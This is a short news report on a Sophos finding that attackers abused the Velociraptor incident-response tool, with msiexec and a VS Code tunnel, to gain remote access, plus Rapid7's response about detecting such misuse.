Sophos cybersecurity specialists have highlighted a cyberattack in which unidentified threat actors used the open-source forensic tool for endpoint monitoring Velociraptor.
“In this incident, the attackers used a tool to download and launch Visual Studio Code, likely with the intention of creating a tunnel to a command-and-control server under their control,” report experts from the Sophos Counter Threat Unit.
The report notes that attackers often employ living-off-the-land (LotL) tactics and use legitimate remote monitoring and management tools in their attacks; however, the use of Velociraptor signals an evolution of these tactics, where incident response software is used for malicious purposes.
As the analysis of this incident showed, the attackers used the Windows utility msiexec to download an MSI installer from a Cloudflare Workers domain, which also serves as a staging platform for other tools used by the hackers, including the Cloudflare tunneling tool and the Radmin remote administration utility.
The MSI file was intended to deploy Velociraptor, which then established communication with another Cloudflare Workers domain. The access obtained was then used to download Visual Studio Code from the same intermediary server using an encoded PowerShell command and to launch it with tunneling enabled, in order to provide both remote access and remote code execution.
In addition, the attackers were observed reusing the Windows msiexec utility to download additional payloads.
“Organizations should monitor and investigate unauthorized use of Velociraptor and consider such tactics a precursor to the deployment of ransomware,” Sophos warns.
After Sophos published this report, the cybersecurity company Rapid7, which develops Velociraptor, released a document that details how organizational security teams can detect Velociraptor misuse in their environments.
“Rapid7 is aware of reports warning about the abuse of the open-source incident response tool Velociraptor. Velociraptor is widely used by defenders for legitimate digital forensics and incident response tasks. But like many other security and administration tools, it can be used for harm if it falls into the wrong hands,” the developers commented.